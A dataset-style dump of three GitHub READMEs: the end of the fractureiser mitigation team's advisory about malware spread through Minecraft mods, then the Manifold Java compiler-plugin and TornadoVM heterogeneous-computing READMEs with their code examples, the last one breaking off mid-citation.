If left unchecked, fractureiser can be **INCREDIBLY DANGEROUS** to your machine. Please read through this document for the info you need to keep yourself safe.
We've dubbed this malware fractureiser because that's the name of the CurseForge account that uploaded the most notable malicious files.
## Current Investigation Status
The fractureiser event has ended — no follow-up Stage0s were ever discovered and no further evidence of activity has been discovered in the past 3 months.
A third C&C was never stood up to our knowledge.
A copycat malware is still possible — and likely inevitable — but *fractureiser* is dead. **Systems that are already infected are still cause for concern**, and the below user documentation is still relevant.
## Follow-Up Meeting
On 2023-06-08 the fractureiser Mitigation Team held a meeting with notable members of the community to discuss preventive measures and solutions for future problems of this scale.
See [this page](https://github.com/fractureiser-investigation/fractureiser/blob/main/docs/2023-06-08-meeting.md) for the agenda and minutes of the event.
## BlanketCon Panel
emilyploszaj and jaskarth, core members of the team, held a panel at BlanketCon 23 about the fractureiser mitigation effort. You can find a [recording of the panel by quat on YouTube](https://youtu.be/9eBmqHAk9HI).
## What YOU need to know
### [Modded Players CLICK HERE](docs/users.md)
If you're simply a mod player and not a developer, the above link is all you need. It contains surface level information of the malware's effects, steps to check if you have it and how to remove it, and an FAQ.
Anyone who wishes to dig deeper may also look at
* [Event Timeline](docs/timeline.md)
* [Technical Breakdown](docs/tech.md)
### I have never used any Minecraft mods
You are not infected.
## Additional Info
We've stopped receiving new unique samples, so the sample submission inbox is closed. If you would like to get in contact with the team, please shoot an email to `fractureiser@unascribed.com`.
If you copy portions of this document elsewhere, *please* put a prominent link back to this [GitHub Repository](https://github.com/fractureiser-investigation/fractureiser) somewhere near the top so that people can read the latest updates and get in contact.
The **only** official public channel that this team ever used for coordination was #cfmalware on EsperNet. ***We have no affiliation with any Discord guilds.***
**Do not ask for samples.** If you have experience and credentials, that's great, but we have no way to verify this without using up tons of our team's limited time. Sharing malware samples is dangerous, even among people who know what they're doing.
---
\- the [fractureiser Mitigation Team](docs/credits.md)
"
manifold-systems/manifold,master,2209,120,2017-06-07T02:37:23Z,126336,63,"Manifold is a Java compiler plugin, its features include Metaprogramming, Properties, Extension Methods, Operator Overloading, Templates, a Preprocessor, and more.",android-studio delegation duck-typing extension-methods graphql graphql-java intellij java java-development java-sql java-tooling js-java-interoperability json manifold metaprogramming preprocessor reflection-framework structural-typing template-engine type-providers,"
![latest](https://img.shields.io/badge/latest-v2024.1.12-royalblue.svg)
[![slack](https://img.shields.io/badge/slack-manifold-seagreen.svg?logo=slack)](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg)
[![GitHub Repo stars](https://img.shields.io/github/stars/manifold-systems/manifold?logo=github&style=flat&color=tan)](https://github.com/manifold-systems/manifold)
---
## What is Manifold?
Manifold is a Java compiler plugin. It supplements Java with:
* Direct, _type-safe_ access to:
* [SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) _**(New!)**_
* [GraphQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)
* [JSON & JSON Schema](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json),
[YAML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml),
[XML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml)
* [CSV](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv)
* [JavaScript](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js)
* etc.
* [Extension methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)
* [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)
* [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)
* [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)
* [Operator overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading)
* [Unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions)
* [A *Java* template engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)
* [A preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)
* ...and more
All fully supported in JDK LTS releases 8 - 21 + latest with comprehensive IDE support in **IntelliJ IDEA** and **Android Studio**.
Manifold consists of a set of modules, one for each feature. Simply add the Manifold dependencies of your choosing to your existing project and begin taking advantage of them.
># _**What's New...**_
>
>
>### [Type-safe SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md)
> Manifold SQL lets you write native SQL _directly_ and _type-safely_ in your Java code.
>- Query types are instantly available as you type native SQL of any complexity in your Java code
>- Schema types are automatically derived from your database, providing type-safe CRUD, decoupled TX, and more
>- No ORM, No DSL, No wiring, and No code generation build steps
>
> [![img_3.png](./docs/images/img_3.png)](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md)
## Who is using Manifold?
Sampling of companies using Manifold:
## What can you do with Manifold?
### [Meta-programming](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold)
Use the framework to gain direct, type-safe access to *any* type of resource, such as
[**SQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql),
[**JSON**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json),
[**GraphQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql),
[**XML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml),
[**YAML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml),
[**CSV**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv), and even
other languages such as [**JavaScript**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js).
Remove the code gen step in your build process. [ **▶** Check it out!](http://manifold.systems/images/graphql.mp4)
[**SQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql)
Use _native_ SQL of any complexity _directly_ and _type-safely_ from Java.
```java
Language english =
  ""[.sql/]select * from Language where name = 'English'"".fetchOne();

Film film = Film.builder(""My Movie"", english)
  .withDescription(""Nice movie"")
  .withReleaseYear(2023)
  .build();

MyDatabase.commit();
```
[**GraphQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)
Use types defined in .graphql files *directly*, no code gen steps! Make GraphQL changes and immediately use them with code completion.
```java
var query = MovieQuery.builder(Action).build();
var result = query.request(""http://com.example/graphql"").post();
var actionMovies = result.getMovies();
for (var movie : actionMovies) {
  out.println(
    ""Title: "" + movie.getTitle() + ""\n"" +
    ""Genre: "" + movie.getGenre() + ""\n"" +
    ""Year: "" + movie.getReleaseDate().getYear() + ""\n"");
}
```
[**JSON:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json)
Use .json schema files directly and type-safely, no code gen steps! Find usages of .json properties in your Java code.
```java
// From User.json
User user = User.builder(""myid"", ""mypassword"", ""Scott"")
  .withGender(male)
  .withDob(LocalDate.of(1987, 6, 15))
  .build();
User.request(""http://api.example.com/users"").postOne(user);
```
### [Extension Methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)
Add your own methods to existing Java classes, even *String*, *List*, and *File*. Eliminate boilerplate code.
[ **▶** Check it out!](http://manifold.systems/images/ExtensionMethod.mp4)
```java
String greeting = ""hello"";
greeting.myMethod(); // Add your own methods to String!
```
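The `myMethod()` call above presumes an extension class. A hedged sketch of defining one (the package layout and annotation imports follow the manifold-ext documentation and may vary by version):
```java
// Extension classes live in a package ending with ""extensions."" + the extended type.
package myproject.extensions.java.lang.String;

import manifold.ext.rt.api.Extension;
import manifold.ext.rt.api.This;

@Extension
public class MyStringExtension {
    public static void myMethod(@This String thiz) {
        System.out.println(""myMethod() called on: "" + thiz);
    }
}
```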
### [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)
Favor composition over inheritance. Use `@link` and `@part` for automatic interface implementation forwarding and _true_ delegation.
> ```java
> class MyClass implements MyInterface {
> @link MyInterface myInterface; // transfers calls on MyInterface to myInterface
>
> public MyClass(MyInterface myInterface) {
> this.myInterface = myInterface; // dynamically configure behavior
> }
>
> // No need to implement MyInterface here, but you can override myInterface as needed
> }
> ```
### [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)
Eliminate boilerplate getter/setter code, improve your overall dev experience with properties.
```java
public interface Book {
@var String title; // no more boilerplate code!
}
// refer to it directly by name
book.title = ""Daisy""; // calls setter
String name = book.title; // calls getter
book.title += "" chain""; // calls getter & setter
```
Additionally, the feature automatically _**infers**_ properties, both from your existing source files and from
compiled classes your project uses. Reduce property use from this:
```java
Actor person = result.getMovie().getLeadingRole().getActor();
Likes likes = person.getLikes();
likes.setCount(likes.getCount() + 1);
```
to this:
```java
result.movie.leadingRole.actor.likes.count++;
```
### [Operator Overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading)
Implement *operator* methods on any type to directly support arithmetic, relational, index, and unit operators.
```java
// BigDecimal expressions
if (bigDec1 > bigDec2) {
  BigDecimal result = bigDec1 + bigDec2;
  ...
}
// Implement operators for any type
MyType value = myType1 + myType2;
```
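A sketch (not from this README) of what `MyType` could look like, assuming the operator-to-method naming described in the manifold-ext documentation (for example, `+` maps to a method named `plus`):
```java
public class MyType {
    private final int value;

    public MyType(int value) {
        this.value = value;
    }

    // Manifold resolves ""myType1 + myType2"" to this method.
    public MyType plus(MyType that) {
        return new MyType(this.value + that.value);
    }
}
```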
### [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)
Tuple expressions provide concise syntax to group named data items in a lightweight structure.
```java
var t = (name: ""Bob"", age: ""35"");
System.out.println(""Name: "" + t.name + "" Age: "" + t.age);
var t = (person.name, person.age);
System.out.println(""Name: "" + t.name + "" Age: "" + t.age);
```
You can also use tuples with new [`auto` type inference](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-inference-with-auto) to enable multiple return values from a method.
### [Unit Expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions)
Unit or *binding* operations are unique to the Manifold framework. They provide a powerfully concise syntax and can be
applied to a wide range of applications.
```java
import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc
...
Length distance = 100 mph * 3 hr;
Force f = 5.2 kg m/s/s; // same as 5.2 N
Mass infant = 9 lb + 8.71 oz;
```
### [Ranges](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections#ranges)
Easily work with the *Range* API using [unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions).
Simply import the *RangeFun* constants to create ranges.
```java
// imports the `to`, `step`, and other ""binding"" constants
import static manifold.collections.api.range.RangeFun.*;
...
for (int i: 1 to 5) {
  out.println(i);
}

for (Mass m: 0kg to 10kg step 22r unit g) {
  out.println(m);
}
```
### [Science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)
Use the [manifold-science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)
framework to type-safely incorporate units and precise measurements into your applications.
```java
import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc.
...
Velocity rate = 65mph;
Time time = 1min + 3.7sec;
Length distance = rate * time;
```
### [Preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)
Use familiar directives such as **#define** and **#if** to conditionally compile your Java projects. The preprocessor offers
a simple and convenient way to support multiple build targets with a single codebase. [ **▶** Check it out!](http://manifold.systems/images/preprocessor.mp4)
```java
#if JAVA_8_OR_LATER
@Override
public void setTime(LocalDateTime time) {...}
#else
@Override
public void setTime(Calendar time) {...}
#endif
```
### [Structural Typing](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#structural-interfaces-via-structural)
Unify disparate APIs. Bridge software components you do not control. Access maps through type-safe interfaces. [ **▶** Check it out!](http://manifold.systems/images/structural%20typing.mp4)
```java
Map<String, Object> map = new HashMap<>();
MyThingInterface thing = (MyThingInterface) map; // O_o
thing.setFoo(new Foo());
Foo foo = thing.getFoo();
out.println(thing.getClass()); // prints ""java.util.HashMap""
```
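A sketch of the structural interface assumed by the example above (the `@Structural` import path follows the manifold-ext documentation and may vary by version):
```java
import manifold.ext.rt.api.Structural;

@Structural
public interface MyThingInterface {
    Foo getFoo();
    void setFoo(Foo foo);
}
```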
### [Type-safe Reflection](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-safe-reflection-via-jailbreak)
Access private features with @Jailbreak to avoid the drudgery and vulnerability of Java reflection. [ **▶** Check it out!](http://manifold.systems/images/jailbreak.mp4)
```java
@Jailbreak Foo foo = new Foo();
// Direct, *type-safe* access to *all* foo's members
foo.privateMethod(x, y, z);
foo.privateField = value;
```
### [Checked Exception Handling](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions)
You now have an option to make checked exceptions behave like unchecked exceptions! No more unintended exception
swallowing. No more *try*/*catch*/*wrap*/*rethrow* boilerplate!
```java
List<String> strings = ...;
List<URL> urls = strings.stream()
    .map(URL::new) // No need to handle the MalformedURLException!
    .collect(Collectors.toList());
```
### [String Templates](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings)
Inline variables and expressions in String literals, no more clunky string concat! [ **▶** Check it out!](http://manifold.systems/images/string_interpolation.mp4)
```java
int hour = 15;
// Simple variable access with '$'
String result = ""The hour is $hour""; // Yes!!!
// Use expressions with '${}'
result = ""It is ${hour > 12 ? hour-12 : hour} o'clock"";
```
### [A *Java* Template Engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)
Author template files with the full expressive power of Java, use your templates directly in your code as types.
Supports type-safe inclusion of other templates, shared layouts, and more. [ **▶** Check it out!](http://manifold.systems/images/mantl.mp4)
```java
List<User> users = ...;
String content = abc.example.UserSample.render(users);
```
A template file *abc/example/UserSample.html.mtl*
```html
<%@ import java.util.List %>
<%@ import com.example.User %>
<%@ params(List<User> users) %>
<% for(User user: users) { %>
<% if(user.getDateOfBirth() != null) { %>
User: ${user.getName()}
DOB: ${user.getDateOfBirth()}
<% } %>
<% } %>
```
## [IDE Support](https://github.com/manifold-systems/manifold)
Use the [Manifold plugin](https://plugins.jetbrains.com/plugin/10057-manifold) to fully leverage
Manifold with **IntelliJ IDEA** and **Android Studio**. The plugin provides comprehensive support for Manifold including code
completion, navigation, usage searching, refactoring, incremental compilation, hotswap debugging, full-featured
template editing, integrated preprocessor, and more.
[Get the plugin from JetBrains Marketplace](https://plugins.jetbrains.com/plugin/10057-manifold)
## [Projects](https://github.com/manifold-systems/manifold)
The Manifold project consists of the core Manifold framework and a collection of sub-projects implementing SPIs provided
by the core framework. Each project consists of one or more **dependencies** you can easily add to your project:
[Manifold : _Core_](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold)
[Manifold : _Extensions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)
[Manifold : _Delegation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)
[Manifold : _Properties_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)
[Manifold : _Tuples_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)
[Manifold : _SQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql)
[Manifold : _GraphQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)
[Manifold : _JSON_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json)
[Manifold : _XML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml)
[Manifold : _YAML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml)
[Manifold : _CSV_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv)
[Manifold : _Property Files_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-properties)
[Manifold : _Image_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-image)
[Manifold : _Dark Java_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-darkj)
[Manifold : _JavaScript_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js)
[Manifold : _Java Templates_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)
[Manifold : _String Interpolation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings)
[Manifold : _(Un)checked Exceptions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions)
[Manifold : _Preprocessor_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)
[Manifold : _Science_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)
[Manifold : _Collections_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections)
[Manifold : _I/O_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-io)
[Manifold : _Text_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-text)
>Experiment with sample projects:
>* [Manifold : _Sample App_](https://github.com/manifold-systems/manifold-sample-project)
>* [Manifold : _Sample SQL App_](https://github.com/manifold-systems/manifold-sql-sample-project)
>* [Manifold : _Sample GraphQL App_](https://github.com/manifold-systems/manifold-sample-graphql-app)
>* [Manifold : _Sample REST API App_](https://github.com/manifold-systems/manifold-sample-rest-api)
>* [Manifold : _Sample Web App_](https://github.com/manifold-systems/manifold-sample-web-app)
>* [Manifold : _Gradle Example Project_](https://github.com/manifold-systems/manifold-simple-gradle-project)
>* [Manifold : _Sample Kotlin App_](https://github.com/manifold-systems/manifold-sample-kotlin-app)
## Platforms
Manifold supports:
* Java SE (8 - 21)
* [Android](http://manifold.systems/android.html)
* [Kotlin](http://manifold.systems/kotlin.html) (limited)
Comprehensive IDE support is also available for IntelliJ IDEA and Android Studio.
## [Chat](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg)
Join our [Slack Group](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) to start
a discussion, ask questions, provide feedback, etc. Someone is usually there to help.
"
beehive-lab/TornadoVM,master,1105,96,2018-09-07T09:37:44Z,120197,31,TornadoVM: A practical and efficient heterogeneous programming framework for managed languages,ai artificial-intelligence cuda fpga gpgpu gpu-acceleration gpu-computing gpus graalvm high-performance java java-library-acceleration level-zero-gpu-runtime levelzero multi-core opencl spirv tornadovm,"# TornadoVM
TornadoVM is a plug-in to OpenJDK and GraalVM that allows programmers to automatically run Java programs on
heterogeneous hardware.
TornadoVM targets OpenCL, PTX and SPIR-V compatible devices which include multi-core CPUs, dedicated
GPUs (Intel, NVIDIA, AMD), integrated GPUs (Intel HD Graphics and ARM Mali), and FPGAs (Intel and Xilinx).
TornadoVM has three backends that generate OpenCL C, NVIDIA CUDA PTX assembly, and SPIR-V binary.
Developers can choose which backends to install and run.
----------------------
**Website**: [tornadovm.org](https://www.tornadovm.org)
**Documentation**: [https://tornadovm.readthedocs.io/en/latest/](https://tornadovm.readthedocs.io/en/latest/)
For a quick introduction please read the following [FAQ](https://tornadovm.readthedocs.io/en/latest/).
**Latest Release:** TornadoVM 1.0.3 - 27/03/2024 :
See [CHANGELOG](https://tornadovm.readthedocs.io/en/latest/CHANGELOG.html).
----------------------
## 1. Installation
In Linux and macOS, TornadoVM can be installed automatically with
the [installation script](https://tornadovm.readthedocs.io/en/latest/installation.html). For example:
```bash
$ ./bin/tornadovm-installer
usage: tornadovm-installer [-h] [--version] [--jdk JDK] [--backend BACKEND] [--listJDKs] [--javaHome JAVAHOME]
TornadoVM Installer Tool. It will install all software dependencies except the GPU/FPGA drivers
optional arguments:
-h, --help show this help message and exit
--version Print version of TornadoVM
--jdk JDK Select one of the supported JDKs. Use --listJDKs option to see all supported ones.
--backend BACKEND Select the backend to install: { opencl, ptx, spirv }
--listJDKs List all JDK supported versions
--javaHome JAVAHOME Use a JDK from a user directory
```
**NOTE** Select the desired backend:
* `opencl`: Enables the OpenCL backend (requires OpenCL drivers)
* `ptx`: Enables the PTX backend (requires NVIDIA CUDA drivers)
* `spirv`: Enables the SPIRV backend (requires Intel Level Zero drivers)
Example of installation:
```bash
# Install the OpenCL backend with OpenJDK 21
$ ./bin/tornadovm-installer --jdk jdk21 --backend opencl
# It is also possible to combine different backends:
$ ./bin/tornadovm-installer --jdk jdk21 --backend opencl,spirv,ptx
```
Alternatively, TornadoVM can be installed either
manually [from source](https://tornadovm.readthedocs.io/en/latest/installation.html#b-manual-installation) or
by [using Docker](https://tornadovm.readthedocs.io/en/latest/docker.html).
If you are planning to use Docker with TornadoVM on GPUs, you can also
follow [these](https://github.com/beehive-lab/docker-tornado#docker-for-tornadovm) guidelines.
You can also run TornadoVM on Amazon AWS CPUs, GPUs, and FPGAs following the
instructions [here](https://tornadovm.readthedocs.io/en/latest/cloud.html).
## 2. Usage Instructions
TornadoVM is currently being used to accelerate machine learning and deep learning applications, computer vision,
physics simulations, financial applications, computational photography, and signal processing.
Featured use-cases:
- [kfusion-tornadovm](https://github.com/beehive-lab/kfusion-tornadovm): Java application for accelerating a
computer-vision application using the Tornado-APIs to run on discrete and integrated GPUs.
- [Java Ray-Tracer](https://github.com/Vinhixus/TornadoVM-Ray-Tracer): Java application accelerated with TornadoVM for
real-time ray-tracing.
We also have a set
of [examples](https://github.com/beehive-lab/TornadoVM/tree/master/tornado-examples/src/main/java/uk/ac/manchester/tornado/examples)
that includes NBody, DFT, KMeans computation and matrix computations.
**Additional Information**
- [General Documentation](https://tornadovm.readthedocs.io/en/latest/introduction.html)
- [Benchmarks](https://tornadovm.readthedocs.io/en/latest/benchmarking.html)
- [How TornadoVM executes reductions](https://tornadovm.readthedocs.io/en/latest/programming.html#parallel-reductions)
- [Execution Flags](https://tornadovm.readthedocs.io/en/latest/flags.html)
- [FPGA execution](https://tornadovm.readthedocs.io/en/latest/fpga-programming.html)
- [Profiler Usage](https://tornadovm.readthedocs.io/en/latest/profiler.html)
## 3. Programming Model
TornadoVM exposes to the programmer task-level, data-level and pipeline-level parallelism via a light Application
Programming Interface (API). In addition, TornadoVM uses single-source property, in which the code to be accelerated and
the host code live in the same Java program.
Compute-kernels in TornadoVM can be programmed using two different approaches (APIs):
#### a) Loop Parallel API
Compute kernels are written in a sequential form (tasks programmed for a single thread execution). To express
parallelism, TornadoVM exposes two annotations that can be used in loops and parameters: a) `@Parallel` for annotating
parallel loops; and b) `@Reduce` for annotating parameters used in reductions.
The following code snippet shows a full example to accelerate Matrix-Multiplication using TornadoVM and the
loop-parallel API:
```java
public class Compute {
    private static void mxmLoop(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
        for (@Parallel int i = 0; i < size; i++) {
            for (@Parallel int j = 0; j < size; j++) {
                float sum = 0.0f;
                for (int k = 0; k < size; k++) {
                    sum += A.get(i, k) * B.get(k, j);
                }
                C.set(i, j, sum);
            }
        }
    }

    public void run(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
        TaskGraph taskGraph = new TaskGraph(""s0"")
            .transferToDevice(DataTransferMode.FIRST_EXECUTION, A, B) // Transfer data from host to device only in the first execution
            .task(""t0"", Compute::mxmLoop, A, B, C, size)              // Each task points to an existing Java method
            .transferToHost(DataTransferMode.EVERY_EXECUTION, C);     // Transfer data from device to host

        // Create an immutable task-graph
        ImmutableTaskGraph immutableTaskGraph = taskGraph.snapshot();

        // Create an execution plan from an immutable task-graph
        TornadoExecutionPlan executionPlan = new TornadoExecutionPlan(immutableTaskGraph);

        // Execute the execution plan
        TornadoExecutionResult executionResult = executionPlan.execute();
    }
}
```
#### b) Kernel API
Another way to express compute-kernels in TornadoVM is via the **kernel API**.
To do so, TornadoVM exposes a `KernelContext` with which the application can directly access the thread-id, allocate
memory in local memory (shared memory on NVIDIA devices), and insert barriers.
This model is similar to programming compute-kernels in OpenCL and CUDA.
Therefore, this API is more suitable for GPU/FPGA expert programmers that want more control or want to port existing
CUDA/OpenCL compute kernels into TornadoVM.
The following code-snippet shows the Matrix Multiplication example using the kernel-parallel API:
```java
public class Compute {
    private static void mxmKernel(KernelContext context, Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
        int idx = context.globalIdx;
        int jdx = context.globalIdy;
        float sum = 0;
        for (int k = 0; k < size; k++) {
            sum += A.get(idx, k) * B.get(k, jdx);
        }
        C.set(idx, jdx, sum);
    }

    public void run(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
        // When using the kernel-parallel API, we need to create a Grid and a Worker
        WorkerGrid workerGrid = new WorkerGrid2D(size, size);                 // Create a 2D Worker
        GridScheduler gridScheduler = new GridScheduler(""s0.t0"", workerGrid); // Attach the worker to the Grid
        KernelContext context = new KernelContext();                          // Create a context
        workerGrid.setLocalWork(32, 32, 1);                                   // Set the local-group size

        TaskGraph taskGraph = new TaskGraph(""s0"")
            .transferToDevice(DataTransferMode.FIRST_EXECUTION, A, B) // Transfer data from host to device only in the first execution
            .task(""t0"", Compute::mxmKernel, context, A, B, C, size)  // Each task points to an existing Java method
            .transferToHost(DataTransferMode.EVERY_EXECUTION, C);     // Transfer data from device to host

        // Create an immutable task-graph
        ImmutableTaskGraph immutableTaskGraph = taskGraph.snapshot();

        // Create an execution plan from an immutable task-graph
        TornadoExecutionPlan executionPlan = new TornadoExecutionPlan(immutableTaskGraph);

        // Execute the execution plan
        executionPlan.withGridScheduler(gridScheduler)
                     .execute();
    }
}
```
Additionally, the two modes of expressing parallelism (kernel and loop parallelization) can be combined in the same task
graph object.
## 4. Dynamic Reconfiguration
Dynamic reconfiguration is the ability of TornadoVM to perform live task migration between devices, which means that
TornadoVM decides where to execute the code to increase performance (if possible). In other words, TornadoVM switches
devices if it can detect that a specific device can yield better performance (compared to another).
With task migration, TornadoVM only switches device if it detects that an application can be executed faster than the
CPU execution using the code compiled by C2 or the Graal JIT; otherwise it stays on the CPU. TornadoVM can therefore be
seen as a complement to the C2 and Graal JIT compilers, because no single piece of hardware executes all workloads best.
GPUs are very good at exploiting SIMD applications, and FPGAs are very good at exploiting pipeline applications. If your
applications follow those models, TornadoVM will likely select heterogeneous hardware. Otherwise, it will stay on the
CPU using the default compilers (C2 or Graal).
To use the dynamic reconfiguration, you can execute using TornadoVM policies.
For example:
```java
// TornadoVM will execute the code in the best accelerator.
executionPlan.withDynamicReconfiguration(Policy.PERFORMANCE, DRMode.PARALLEL)
             .execute();
```
Further details and instructions on how to enable this feature can be found below:
* Dynamic
reconfiguration: [https://dl.acm.org/doi/10.1145/3313808.3313819](https://dl.acm.org/doi/10.1145/3313808.3313819)
## 5. How to Use TornadoVM in your Projects?
To use TornadoVM, you need two components:
a) The TornadoVM `jar` file with the API. The API is licensed as GPLV2 with Classpath Exception.
b) The core libraries of TornadoVM along with the dynamic library for the driver code (`.so` files for OpenCL, PTX
and/or SPIRV/Level Zero).
You can import the TornadoVM API by adding the following repository and dependencies to the Maven `pom.xml` file:
```xml
<repositories>
    <repository>
        <id>universityOfManchester-graal</id>
        <url>https://raw.githubusercontent.com/beehive-lab/tornado/maven-tornadovm</url>
    </repository>
</repositories>

<dependencies>
    <dependency>
        <groupId>tornado</groupId>
        <artifactId>tornado-api</artifactId>
        <version>1.0.3</version>
    </dependency>
    <dependency>
        <groupId>tornado</groupId>
        <artifactId>tornado-matrices</artifactId>
        <version>1.0.3</version>
    </dependency>
</dependencies>
```
To run TornadoVM, you need to either install the TornadoVM extension for GraalVM/OpenJDK, or run with our
Docker [images](https://github.com/beehive-lab/docker-tornado).
## 6. Additional Resources
[Here](https://tornadovm.readthedocs.io/en/latest/resources.html) you can find videos, presentations, tech-articles and
artefacts describing TornadoVM, and how to use it.
## 7. Academic Publications
If you are using **TornadoVM >= 0.2** (which includes the Dynamic Reconfiguration, the initial FPGA support and CPU/GPU
reductions), please use the following citation:
```bibtex
@inproceedings{Fumero:DARHH:VEE:2019,
author = {Fumero, Juan and Papadimitriou, Michail and Zakkak, Foivos S. and Xekalaki, Maria and Clarkson, James and Kotselidis, Christos},
title = {{Dynamic Application Reconfiguration on Heterogeneous Hardware.}},
booktitle = {Proceedings of the 15th ACM SIGPLAN/SIGOPS International Conference on Virtual Execution Environments},
series = {VEE '19},
year = {2019},
doi = {10.1145/3313808.3313819},
publisher = {Association for Computing Machinery}
}
```
If you are using **Tornado 0.1** (Initial release), please use the following citation in your work.
```bibtex
@inproceedings{Clarkson:2018:EHH:3237009.3237016,
author = {Clarkson, James and Fumero, Juan and Papadimitriou, Michail and Zakkak, Foivos S. and Xekalaki, Maria and Kotselidis, Christos and Luj\'{a}n, Mikel},
title = {{Exploiting High-performance Heterogeneous Hardware for Java Programs Using Graal}},
booktitle = {Proceedings of the 15th International Conference on Managed Languages \& Runtimes},
series = {ManLang '18},
year = {2018},
isbn = {978-1-4503-6424-9},
location = {Linz, Austria},
pages = {4:1--4:13},
articleno = {4},
numpages = {13},
url = {http://doi.acm.org/10.1145/3237009.3237016},
doi = {10.1145/3237009.3237016},
acmid = {3237016},
publisher = {ACM},
address = {New York, NY, USA},
